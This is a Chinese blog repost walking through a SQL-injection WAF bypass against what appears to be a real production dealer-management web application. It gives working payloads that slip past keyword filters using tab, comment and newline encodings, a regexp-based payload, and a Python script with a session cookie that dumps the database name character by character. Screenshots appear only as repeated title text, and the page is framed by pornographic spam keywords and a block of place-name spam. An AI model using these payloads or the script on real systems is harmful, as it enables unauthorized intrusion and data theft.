亚洲激情专区-91九色丨porny丨老师-久久久久久久女国产乱让韩-国产精品午夜小视频观看

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

如何解析SQL的bypass案例分析

發布時間:2021-12-09 18:41:11 來源:億速云 閱讀:167 作者:柒染 欄目:大數據

這篇文章給大家介紹如何解析SQL的bypass案例分析,內容非常詳細,感興趣的小伙伴們可以參考借鑒,希望對大家能有所幫助。

一、測試發現一個布爾型注入點,測試過程如下:

1、原始請求

如何解析SQL的bypass案例分析2、輸入’or’1’like’1

如何解析SQL的bypass案例分析

3、輸入’or’1’like’2

如何解析SQL的bypass案例分析

4、初步判斷存在布爾型sql盲注,然后開始判斷庫名長度:

如何解析SQL的bypass案例分析5、首先想到可能處理了空格,手工簡單測試下:

如何解析SQL的bypass案例分析

如何解析SQL的bypass案例分析

如何解析SQL的bypass案例分析

如何解析SQL的bypass案例分析

6、發現:

空格or(不攔截)

or空格(攔截)

or/**/(攔截)

or%09 %0a %0b %0c %0d(不攔截)

二、簡單fuzz下字符:

如何解析SQL的bypass案例分析1、or (偶數個~) 也可以bypass

如何解析SQL的bypass案例分析

如何解析SQL的bypass案例分析

2、奇數個~執行失敗:

如何解析SQL的bypass案例分析3、進一步獲取庫名長度:

如何解析SQL的bypass案例分析

4、還是被攔截,猜測是處理了length()或database()函數,簡單嘗試下:

如何解析SQL的bypass案例分析

5、length()被處理掉了,fuzz一下:

如何解析SQL的bypass案例分析

6、利用注釋換行符組合如length%23%0a()即可繞過:

如何解析SQL的bypass案例分析

7、這里還是報錯,簡單測試了下,把空格鍵換一下即可解決:

如何解析SQL的bypass案例分析8、繼續判斷庫名長度:

如何解析SQL的bypass案例分析

9、database()也被處理掉了,同樣的方法可繞過:

如何解析SQL的bypass案例分析10、最終得出數據庫長度為7,如下圖:

如何解析SQL的bypass案例分析

11、獲取庫名

如何解析SQL的bypass案例分析

12、substr未攔截,借助intruder跑一下:

如何解析SQL的bypass案例分析

注出第一個字符為l

三、寫個腳本拖一下完整庫名:

import requests
payloads = 'abcdefghijklmnopqrstuvwxyz_-'database = ''for l in range(1,8):       for payload in payloads:              burp0_url = "https://xxxxxx.xxxxxxxx.com:443/dms.web/manage/rest/basedata/DutyRecord?sort=EMPLOYEE_NO&order=asc&limit=10&offset=0&registerDate=2020-08-19'or%09substr(database%23%0a(),{0},1)%3d'{1}'%09or'1'like'2&employeeNo=0222&onDutyTime=08%3A00&offDutyTime=17%3A00&usableWorkingHours=9.0&dms_table=%5Bobject+Object%5D%2C%5Bobject+Object%5D%2C%5Bobject+Object%5D%2C%5Bobject+Object%5D%2C%5Bobject+Object%5D%2C%5Bobject+Object%5D%2C%5Bobject+Object%5D%2C%5Bobject+Object%5D%2C%5Bobject+Object%5D&dmsFuncId=15100070&_=1597802235462".format(l,payload)              burp0_cookies = {"JSESSIONID": "ABCWB37FFE3DB54BD5705453E681E41F2", "selectDealerCode": "xxxx", "selectusername": "xxxx", "language": "zh_CN"}              burp0_headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:79.0) Gecko/20100101 Firefox/79.0", "Accept": "application/json, text/javascript, */*; q=0.01", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json", "X-Requested-With": "XMLHttpRequest", "Connection": "close", "Referer": "https://xxxxxx.yxxxxuxuxo.xxm/dms.web/html/index.html"}              resp = requests.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies)              if "2018-10-22" in resp.content:                     database += payload                     print '[*]success\t' + database              else:                     print '[*]dumping......'print '[*]current database is:\t' + database

如何解析SQL的bypass案例分析

借助regexp正則匹配也可以實現,payload:

'%20or%0adatabase%23%0a()regexp'%5el'%09or%09'2'like'1

如何解析SQL的bypass案例分析

如何解析SQL的bypass案例分析

成功注出第一個字符:l,以此類推。

關于如何解析SQL的bypass案例分析就分享到這里了,希望以上內容可以對大家有一定的幫助,可以學到更多知識。如果覺得文章不錯,可以把它分享出去讓更多的人看到。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

宝丰县| 米林县| 武安市| 扬中市| 和顺县| 抚顺市| 丹棱县| 昆山市| 华阴市| 田东县| 集贤县| 白朗县| 正镶白旗| 都江堰市| 黑河市| 长岛县| 日土县| 峨山| 长子县| 祁东县| 天水市| 沈阳市| 许昌县| 平阴县| 荥阳市| 卢湾区| 新安县| 高青县| 营口市| 天镇县| 夏河县| 兴文县| 漳平市| 大名县| 双桥区| 孟津县| 冀州市| 湛江市| 吕梁市| 博白县| 五大连池市|